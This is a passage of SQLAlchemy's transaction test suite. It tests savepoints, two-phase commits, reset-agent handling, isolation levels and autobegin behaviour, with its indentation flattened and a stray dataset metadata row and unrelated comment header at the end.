connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
assert connection.in_transaction()
transaction.close()
assert not connection.in_transaction()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 0
@testing.requires.savepoints
def test_nested_subtransaction_rollback(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
trans2 = connection.begin_nested()
connection.execute(users.insert(), user_id=2, user_name="user2")
trans2.rollback()
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.commit()
eq_(
connection.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,), (3,)],
)
@testing.requires.savepoints
def test_nested_subtransaction_commit(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
trans2 = connection.begin_nested()
connection.execute(users.insert(), user_id=2, user_name="user2")
trans2.commit()
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.commit()
eq_(
connection.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,), (2,), (3,)],
)
@testing.requires.two_phase_transactions
def test_two_phase_transaction(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=1, user_name="user1")
transaction.prepare()
transaction.commit()
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=2, user_name="user2")
transaction.commit()
transaction.close()
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.rollback()
transaction = connection.begin_twophase()
connection.execute(users.insert(), user_id=4, user_name="user4")
transaction.prepare()
transaction.rollback()
transaction.close()
eq_(
connection.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,), (2,)],
)
@testing.requires.two_phase_transactions
@testing.requires.two_phase_recovery
def test_two_phase_recover(self):
users = self.tables.users
# 2020, still can't get this to work w/ modern MySQL or MariaDB.
# the XA RECOVER comes back as bytes, OK, convert to string,
# XA COMMIT then says Unknown XID. Also, the drivers seem to be
# killing off the XID if I use the connection.invalidate() before
# trying to access in another connection. Not really worth it
# unless someone wants to step through how mysqlclient / pymysql
# support this correctly.
connection = testing.db.connect()
transaction = connection.begin_twophase()
connection.execute(users.insert(), dict(user_id=1, user_name="user1"))
transaction.prepare()
connection.invalidate()
with testing.db.connect() as connection2:
eq_(
connection2.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[],
)
# recover_twophase needs to be run in a new transaction
with testing.db.connect() as connection2:
recoverables = connection2.recover_twophase()
assert transaction.xid in recoverables
connection2.commit_prepared(transaction.xid, recover=True)
eq_(
connection2.execute(
select(users.c.user_id).order_by(users.c.user_id)
).fetchall(),
[(1,)],
)
@testing.requires.two_phase_transactions
def test_multiple_two_phase(self, local_connection):
conn = local_connection
users = self.tables.users
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=1, user_name="user1")
xa.prepare()
xa.commit()
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=2, user_name="user2")
xa.prepare()
xa.rollback()
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=3, user_name="user3")
xa.rollback()
xa = conn.begin_twophase()
conn.execute(users.insert(), user_id=4, user_name="user4")
xa.prepare()
xa.commit()
result = conn.execute(
select(users.c.user_name).order_by(users.c.user_id)
)
eq_(result.fetchall(), [("user1",), ("user4",)])
@testing.requires.two_phase_transactions
def test_reset_rollback_two_phase_no_rollback(self):
# test [ticket:2907], essentially that the
# TwoPhaseTransaction is given the job of "reset on return"
# so that picky backends like MySQL correctly clear out
# their state when a connection is closed without handling
# the transaction explicitly.
users = self.tables.users
eng = testing_engine()
# MySQL raises if you call straight rollback() on
# a connection with an XID present
@event.listens_for(eng, "invalidate")
def conn_invalidated(dbapi_con, con_record, exception):
dbapi_con.close()
raise exception
with eng.connect() as conn:
rec = conn.connection._connection_record
raw_dbapi_con = rec.connection
conn.begin_twophase()
conn.execute(users.insert(), user_id=1, user_name="user1")
assert rec.connection is raw_dbapi_con
with eng.connect() as conn:
result = conn.execute(
select(users.c.user_name).order_by(users.c.user_id)
)
eq_(result.fetchall(), [])
class ResetAgentTest(fixtures.TestBase):
__backend__ = True
def test_begin_close(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
assert not trans.is_active
def test_begin_rollback(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
def test_begin_commit(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
def test_trans_close(self):
with testing.db.connect() as connection:
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.close()
assert connection.connection._reset_agent is None
def test_trans_reset_agent_broken_ensure(self):
eng = testing_engine()
conn = eng.connect()
trans = conn.begin()
assert conn.connection._reset_agent is trans
trans.is_active = False
with expect_warnings("Reset agent is not active"):
conn.close()
def test_trans_commit_reset_agent_broken_ensure_pool(self):
eng = testing_engine(options={"pool_reset_on_return": "commit"})
conn = eng.connect()
trans = conn.begin()
assert conn.connection._reset_agent is trans
trans.is_active = False
with expect_warnings("Reset agent is not active"):
conn.close()
@testing.requires.savepoints
def test_begin_nested_trans_close_one(self):
with testing.db.connect() as connection:
t1 = connection.begin()
assert connection.connection._reset_agent is t1
t2 = connection.begin_nested()
assert connection.connection._reset_agent is t1
assert connection._nested_transaction is t2
assert connection._transaction is t1
t2.close()
assert connection._nested_transaction is None
assert connection._transaction is t1
assert connection.connection._reset_agent is t1
t1.close()
assert connection.connection._reset_agent is None
assert not t1.is_active
@testing.requires.savepoints
def test_begin_nested_trans_close_two(self):
with testing.db.connect() as connection:
t1 = connection.begin()
assert connection.connection._reset_agent is t1
t2 = connection.begin_nested()
assert connection.connection._reset_agent is t1
assert connection._nested_transaction is t2
assert connection._transaction is t1
assert connection.connection._reset_agent is t1
t1.close()
assert connection._nested_transaction is None
assert connection._transaction is None
assert connection.connection._reset_agent is None
assert not t1.is_active
@testing.requires.savepoints
def test_begin_nested_trans_rollback(self):
with testing.db.connect() as connection:
t1 = connection.begin()
assert connection.connection._reset_agent is t1
t2 = connection.begin_nested()
assert connection.connection._reset_agent is t1
assert connection._nested_transaction is t2
assert connection._transaction is t1
t2.close()
assert connection._nested_transaction is None
assert connection._transaction is t1
assert connection.connection._reset_agent is t1
t1.rollback()
assert connection._transaction is None
assert connection.connection._reset_agent is None
assert not t2.is_active
assert not t1.is_active
@testing.requires.savepoints
def test_begin_nested_close(self):
with testing.db.connect() as connection:
trans = connection.begin_nested()
assert (
connection.connection._reset_agent is connection._transaction
)
assert not trans.is_active
@testing.requires.savepoints
def test_begin_begin_nested_close(self):
with testing.db.connect() as connection:
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
assert not trans2.is_active
assert not trans.is_active
@testing.requires.savepoints
def test_begin_begin_nested_rollback_commit(self):
with testing.db.connect() as connection:
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
@testing.requires.savepoints
def test_begin_begin_nested_rollback_rollback(self):
with testing.db.connect() as connection:
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase(self):
with testing.db.connect() as connection:
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_commit(self):
with testing.db.connect() as connection:
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_rollback(self):
with testing.db.connect() as connection:
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
class AutoRollbackTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global metadata
metadata = MetaData()
@classmethod
def teardown_class(cls):
metadata.drop_all(testing.db)
def test_rollback_deadlock(self):
"""test that returning connections to the pool clears any object
locks."""
conn1 = testing.db.connect()
conn2 = testing.db.connect()
users = Table(
"deadlock_users",
metadata,
Column("user_id", INT, primary_key=True),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
with conn1.begin():
users.create(conn1)
conn1.exec_driver_sql("select * from deadlock_users")
conn1.close()
# without auto-rollback in the connection pool's return() logic,
# this deadlocks in PostgreSQL, because conn1 is returned to the
# pool but still has a lock on "deadlock_users". comment out the
# rollback in pool/ConnectionFairy._close() to see !
with conn2.begin():
users.drop(conn2)
conn2.close()
class IsolationLevelTest(fixtures.TestBase):
__requires__ = ("isolation_level", "ad_hoc_engines")
__backend__ = True
def _default_isolation_level(self):
return testing.requires.get_isolation_levels(testing.config)["default"]
def _non_default_isolation_level(self):
levels = testing.requires.get_isolation_levels(testing.config)
default = levels["default"]
supported = levels["supported"]
s = set(supported).difference(["AUTOCOMMIT", default])
if s:
return s.pop()
else:
assert False, "no non-default isolation level available"
def test_engine_param_stays(self):
eng = testing_engine()
isolation_level = eng.dialect.get_isolation_level(
eng.connect().connection
)
level = self._non_default_isolation_level()
ne_(isolation_level, level)
eng = testing_engine(options=dict(isolation_level=level))
eq_(eng.dialect.get_isolation_level(eng.connect().connection), level)
# check that it stays
conn = eng.connect()
eq_(eng.dialect.get_isolation_level(conn.connection), level)
conn.close()
conn = eng.connect()
eq_(eng.dialect.get_isolation_level(conn.connection), level)
conn.close()
def test_default_level(self):
eng = testing_engine(options=dict())
isolation_level = eng.dialect.get_isolation_level(
eng.connect().connection
)
eq_(isolation_level, self._default_isolation_level())
def test_reset_level(self):
eng = testing_engine(options=dict())
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._default_isolation_level(),
)
eng.dialect.set_isolation_level(
conn.connection, self._non_default_isolation_level()
)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
eng.dialect.reset_isolation_level(conn.connection)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._default_isolation_level(),
)
conn.close()
def test_reset_level_with_setting(self):
eng = testing_engine(
options=dict(isolation_level=self._non_default_isolation_level())
)
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
eng.dialect.set_isolation_level(
conn.connection, self._default_isolation_level()
)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._default_isolation_level(),
)
eng.dialect.reset_isolation_level(conn.connection)
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
conn.close()
def test_invalid_level(self):
eng = testing_engine(options=dict(isolation_level="FOO"))
assert_raises_message(
exc.ArgumentError,
"Invalid value '%s' for isolation_level. "
"Valid isolation levels for %s are %s"
% (
"FOO",
eng.dialect.name,
", ".join(eng.dialect._isolation_lookup),
),
eng.connect,
)
def test_connection_invalidated(self):
eng = testing_engine()
conn = eng.connect()
c2 = conn.execution_options(
isolation_level=self._non_default_isolation_level()
)
c2.invalidate()
c2.connection
# TODO: do we want to rebuild the previous isolation?
# for now, this is current behavior so we will leave it.
eq_(c2.get_isolation_level(), self._default_isolation_level())
def test_per_connection(self):
from sqlalchemy.pool import QueuePool
eng = testing_engine(
options=dict(poolclass=QueuePool, pool_size=2, max_overflow=0)
)
c1 = eng.connect()
c1 = c1.execution_options(
isolation_level=self._non_default_isolation_level()
)
c2 = eng.connect()
eq_(
eng.dialect.get_isolation_level(c1.connection),
self._non_default_isolation_level(),
)
eq_(
eng.dialect.get_isolation_level(c2.connection),
self._default_isolation_level(),
)
c1.close()
c2.close()
c3 = eng.connect()
eq_(
eng.dialect.get_isolation_level(c3.connection),
self._default_isolation_level(),
)
c4 = eng.connect()
eq_(
eng.dialect.get_isolation_level(c4.connection),
self._default_isolation_level(),
)
c3.close()
c4.close()
def test_warning_in_transaction(self):
eng = testing_engine()
c1 = eng.connect()
with expect_warnings(
"Connection is already established with a Transaction; "
"setting isolation_level may implicitly rollback or commit "
"the existing transaction, or have no effect until next "
"transaction"
):
with c1.begin():
c1 = c1.execution_options(
isolation_level=self._non_default_isolation_level()
)
eq_(
eng.dialect.get_isolation_level(c1.connection),
self._non_default_isolation_level(),
)
# stays outside of transaction
eq_(
eng.dialect.get_isolation_level(c1.connection),
self._non_default_isolation_level(),
)
def test_per_statement_bzzt(self):
assert_raises_message(
exc.ArgumentError,
r"'isolation_level' execution option may only be specified "
r"on Connection.execution_options\(\), or "
r"per-engine using the isolation_level "
r"argument to create_engine\(\).",
select(1).execution_options,
isolation_level=self._non_default_isolation_level(),
)
def test_per_engine(self):
# new in 0.9
eng = create_engine(
testing.db.url,
execution_options={
"isolation_level": self._non_default_isolation_level()
},
)
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
def test_per_option_engine(self):
eng = create_engine(testing.db.url).execution_options(
isolation_level=self._non_default_isolation_level()
)
conn = eng.connect()
eq_(
eng.dialect.get_isolation_level(conn.connection),
self._non_default_isolation_level(),
)
def test_isolation_level_accessors_connection_default(self):
eng = create_engine(testing.db.url)
with eng.connect() as conn:
eq_(conn.default_isolation_level, self._default_isolation_level())
with eng.connect() as conn:
eq_(conn.get_isolation_level(), self._default_isolation_level())
def test_isolation_level_accessors_connection_option_modified(self):
eng = create_engine(testing.db.url)
with eng.connect() as conn:
c2 = conn.execution_options(
isolation_level=self._non_default_isolation_level()
)
eq_(conn.default_isolation_level, self._default_isolation_level())
eq_(
conn.get_isolation_level(), self._non_default_isolation_level()
)
eq_(c2.get_isolation_level(), self._non_default_isolation_level())
class ConnectionCharacteristicTest(fixtures.TestBase):
@testing.fixture
def characteristic_fixture(self):
class FooCharacteristic(characteristics.ConnectionCharacteristic):
transactional = True
def reset_characteristic(self, dialect, dbapi_conn):
dialect.reset_foo(dbapi_conn)
def set_characteristic(self, dialect, dbapi_conn, value):
dialect.set_foo(dbapi_conn, value)
def get_characteristic(self, dialect, dbapi_conn):
return dialect.get_foo(dbapi_conn)
class FooDialect(default.DefaultDialect):
connection_characteristics = util.immutabledict(
{"foo": FooCharacteristic()}
)
def reset_foo(self, dbapi_conn):
dbapi_conn.foo = "original_value"
def set_foo(self, dbapi_conn, value):
dbapi_conn.foo = value
def get_foo(self, dbapi_conn):
return dbapi_conn.foo
connection = mock.Mock()
def creator():
connection.foo = "original_value"
return connection
pool = _pool.SingletonThreadPool(creator=creator)
u = url.make_url("foo://")
return base.Engine(pool, FooDialect(), u), connection
def test_engine_param_stays(self, characteristic_fixture):
engine, connection = characteristic_fixture
foo_level = engine.dialect.get_foo(engine.connect().connection)
new_level = "new_level"
ne_(foo_level, new_level)
eng = engine.execution_options(foo=new_level)
eq_(eng.dialect.get_foo(eng.connect().connection), new_level)
# check that it stays
conn = eng.connect()
eq_(eng.dialect.get_foo(conn.connection), new_level)
conn.close()
conn = eng.connect()
eq_(eng.dialect.get_foo(conn.connection), new_level)
conn.close()
def test_default_level(self, characteristic_fixture):
engine, connection = characteristic_fixture
eq_(
engine.dialect.get_foo(engine.connect().connection),
"original_value",
)
def test_connection_invalidated(self, characteristic_fixture):
engine, connection = characteristic_fixture
conn = engine.connect()
c2 = conn.execution_options(foo="new_value")
eq_(connection.foo, "new_value")
c2.invalidate()
c2.connection
eq_(connection.foo, "original_value")
def test_warning_in_transaction(self, characteristic_fixture):
engine, connection = characteristic_fixture
c1 = engine.connect()
with expect_warnings(
"Connection is already established with a Transaction; "
"setting foo may implicitly rollback or commit "
"the existing transaction, or have no effect until next "
"transaction"
):
with c1.begin():
c1 = c1.execution_options(foo="new_foo")
eq_(
engine.dialect.get_foo(c1.connection),
"new_foo",
)
# stays outside of transaction
eq_(engine.dialect.get_foo(c1.connection), "new_foo")
@testing.fails("no error is raised yet here.")
def test_per_statement_bzzt(self, characteristic_fixture):
engine, connection = characteristic_fixture
# this would need some on-execute mechanism to look inside of
# the characteristics list. unfortunately this would
# add some latency.
assert_raises_message(
exc.ArgumentError,
r"'foo' execution option may only be specified "
r"on Connection.execution_options\(\), or "
r"per-engine using the isolation_level "
r"argument to create_engine\(\).",
connection.execute,
select([1]).execution_options(foo="bar"),
)
def test_per_engine(self, characteristic_fixture):
engine, connection = characteristic_fixture
pool, dialect, url = engine.pool, engine.dialect, engine.url
eng = base.Engine(
pool, dialect, url, execution_options={"foo": "new_value"}
)
conn = eng.connect()
eq_(eng.dialect.get_foo(conn.connection), "new_value")
def test_per_option_engine(self, characteristic_fixture):
engine, connection = characteristic_fixture
eng = engine.execution_options(foo="new_value")
conn = eng.connect()
eq_(
eng.dialect.get_foo(conn.connection),
"new_value",
)
class FutureResetAgentTest(fixtures.FutureEngineMixin, fixtures.TestBase):
"""Still some debate over if the "reset agent" should apply to the
future connection or not.
"""
__backend__ = True
def test_begin_close(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary)
trans = connection.begin()
assert connection.connection._reset_agent is trans
assert not trans.is_active
eq_(canary.mock_calls, [mock.call(connection)])
def test_begin_rollback(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary)
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
assert not trans.is_active
eq_(canary.mock_calls, [mock.call(connection)])
def test_begin_commit(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
assert not trans.is_active
eq_(canary.mock_calls, [mock.call.commit(connection)])
@testing.requires.savepoints
def test_begin_nested_close(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin_nested()
assert (
connection.connection._reset_agent is connection._transaction
)
# it's a savepoint, but root made sure it closed
assert not trans.is_active
eq_(canary.mock_calls, [mock.call.rollback(connection)])
@testing.requires.savepoints
def test_begin_begin_nested_close(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
assert not trans2.is_active
assert not trans.is_active
eq_(canary.mock_calls, [mock.call.rollback(connection)])
@testing.requires.savepoints
def test_begin_begin_nested_rollback_commit(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(
connection, "rollback_savepoint", canary.rollback_savepoint
)
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback() # this is not a connection level event
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
eq_(
canary.mock_calls,
[
mock.call.rollback_savepoint(connection, mock.ANY, None),
mock.call.commit(connection),
],
)
@testing.requires.savepoints
def test_begin_begin_nested_rollback_rollback(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
trans = connection.begin()
trans2 = connection.begin_nested()
assert connection.connection._reset_agent is trans
trans2.rollback()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
eq_(canary.mock_calls, [mock.call.rollback(connection)])
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(
connection, "rollback_twophase", canary.rollback_twophase
)
event.listen(connection, "commit", canary.commit)
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
assert not trans.is_active
eq_(
canary.mock_calls,
[mock.call.rollback_twophase(connection, mock.ANY, False)],
)
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_commit(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(connection, "commit", canary.commit)
event.listen(connection, "commit_twophase", canary.commit_twophase)
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.commit()
assert connection.connection._reset_agent is None
eq_(
canary.mock_calls,
[mock.call.commit_twophase(connection, mock.ANY, False)],
)
@testing.requires.two_phase_transactions
def test_reset_via_agent_begin_twophase_rollback(self):
canary = mock.Mock()
with testing.db.connect() as connection:
event.listen(connection, "rollback", canary.rollback)
event.listen(
connection, "rollback_twophase", canary.rollback_twophase
)
event.listen(connection, "commit", canary.commit)
trans = connection.begin_twophase()
assert connection.connection._reset_agent is trans
trans.rollback()
assert connection.connection._reset_agent is None
eq_(
canary.mock_calls,
[mock.call.rollback_twophase(connection, mock.ANY, False)],
)
class FutureTransactionTest(fixtures.FutureEngineMixin, fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
def test_autobegin_rollback(self):
users = self.tables.users
with testing.db.connect() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.rollback()
eq_(conn.scalar(select(func.count(1)).select_from(users)), 0)
@testing.requires.autocommit
def test_autocommit_isolation_level(self):
users = self.tables.users
with testing.db.connect().execution_options(
isolation_level="AUTOCOMMIT"
) as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.rollback()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.autocommit
def test_no_autocommit_w_begin(self):
with testing.db.begin() as conn:
assert_raises_message(
exc.InvalidRequestError,
"This connection has already begun a transaction; "
"isolation_level may not be altered until transaction end",
conn.execution_options,
isolation_level="AUTOCOMMIT",
)
@testing.requires.autocommit
def test_no_autocommit_w_autobegin(self):
with testing.db.connect() as conn:
conn.execute(select(1))
assert_raises_message(
exc.InvalidRequestError,
"This connection has already begun a transaction; "
"isolation_level may not be altered until transaction end",
conn.execution_options,
isolation_level="AUTOCOMMIT",
)
conn.rollback()
conn.execution_options(isolation_level="AUTOCOMMIT")
def test_autobegin_commit(self):
users = self.tables.users
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
assert conn.in_transaction()
conn.commit()
assert not conn.in_transaction()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
conn.execute(users.insert(), {"user_id": 2, "user_name": "name 2"})
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
assert conn.in_transaction()
conn.rollback()
assert not conn.in_transaction()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
def test_rollback_on_close(self):
canary = mock.Mock()
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
conn.execute(select(1))
assert conn.in_transaction()
eq_(canary.mock_calls, [mock.call(conn)])
def test_no_on_close_no_transaction(self):
canary = mock.Mock()
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
conn.execute(select(1))
conn.rollback()
assert not conn.in_transaction()
eq_(canary.mock_calls, [mock.call(conn)])
def test_rollback_on_exception(self):
canary = mock.Mock()
try:
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
conn.execute(select(1))
assert conn.in_transaction()
raise Exception("some error")
assert False
except:
pass
eq_(canary.mock_calls, [mock.call(conn)])
def test_rollback_on_exception_if_no_trans(self):
canary = mock.Mock()
try:
with testing.db.connect() as conn:
event.listen(conn, "rollback", canary)
assert not conn.in_transaction()
raise Exception("some error")
assert False
except:
pass
eq_(canary.mock_calls, [])
def test_commit_no_begin(self):
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.commit()
@testing.requires.independent_connections
def test_commit_inactive(self):
with testing.db.connect() as conn:
conn.begin()
conn.invalidate()
assert_raises_message(
exc.InvalidRequestError, "Can't reconnect until", conn.commit
)
@testing.requires.independent_connections
def test_rollback_inactive(self):
users = self.tables.users
with testing.db.connect() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.commit()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
conn.invalidate()
assert_raises_message(
exc.PendingRollbackError,
"Can't reconnect",
conn.execute,
select(1),
)
conn.rollback()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
def test_rollback_no_begin(self):
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.rollback()
def test_rollback_end_ctx_manager(self):
with testing.db.begin() as conn:
assert conn.in_transaction()
conn.rollback()
def test_explicit_begin(self):
users = self.tables.users
with testing.db.connect() as conn:
assert not conn.in_transaction()
conn.begin()
assert conn.in_transaction()
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.commit()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
def test_no_double_begin(self):
with testing.db.connect() as conn:
conn.begin()
assert_raises_message(
exc.InvalidRequestError,
"a transaction is already begun for this connection",
conn.begin,
)
def test_no_autocommit(self):
users = self.tables.users
with testing.db.connect() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
0,
)
def test_begin_block(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.savepoints
def test_savepoint_one(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
savepoint = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
savepoint.rollback()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.savepoints
def test_savepoint_two(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
savepoint = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
savepoint.commit()
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
@testing.requires.savepoints
def test_savepoint_three(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
conn.rollback()
assert not conn.in_transaction()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
0,
)
@testing.requires.savepoints
def test_savepoint_four(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
sp1 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
sp2.rollback()
assert not sp2.is_active
assert sp1.is_active
assert conn.in_transaction()
assert not sp1.is_active
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
2,
)
@testing.requires.savepoints
def test_savepoint_five(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
sp2.commit()
assert conn.in_transaction()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
3,
)
@testing.requires.savepoints
def test_savepoint_six(self):
users = self.tables.users
with testing.db.begin() as conn:
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
sp1 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
assert conn._nested_transaction is sp1
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
assert conn._nested_transaction is sp2
sp2.commit()
assert conn._nested_transaction is sp1
sp1.rollback()
assert conn._nested_transaction is None
assert conn.in_transaction()
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
1,
)
@testing.requires.savepoints
def test_savepoint_seven(self):
users = self.tables.users
conn = testing.db.connect()
trans = conn.begin()
conn.execute(users.insert(), {"user_id": 1, "user_name": "name"})
sp1 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 2, "user_name": "name2"})
sp2 = conn.begin_nested()
conn.execute(users.insert(), {"user_id": 3, "user_name": "name3"})
assert conn.in_transaction()
trans.close()
assert not sp1.is_active
assert not sp2.is_active
assert not trans.is_active
assert conn._transaction is None
assert conn._nested_transaction is None
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count(1)).select_from(users)),
0,
)
| 34.509615 | 79 | 0.608352 | [
"MIT"
] | 418sec/sqlalchemy | test/engine/test_transaction.py | 57,424 | Python |
#----------------#
# Name: Mod_Obj #
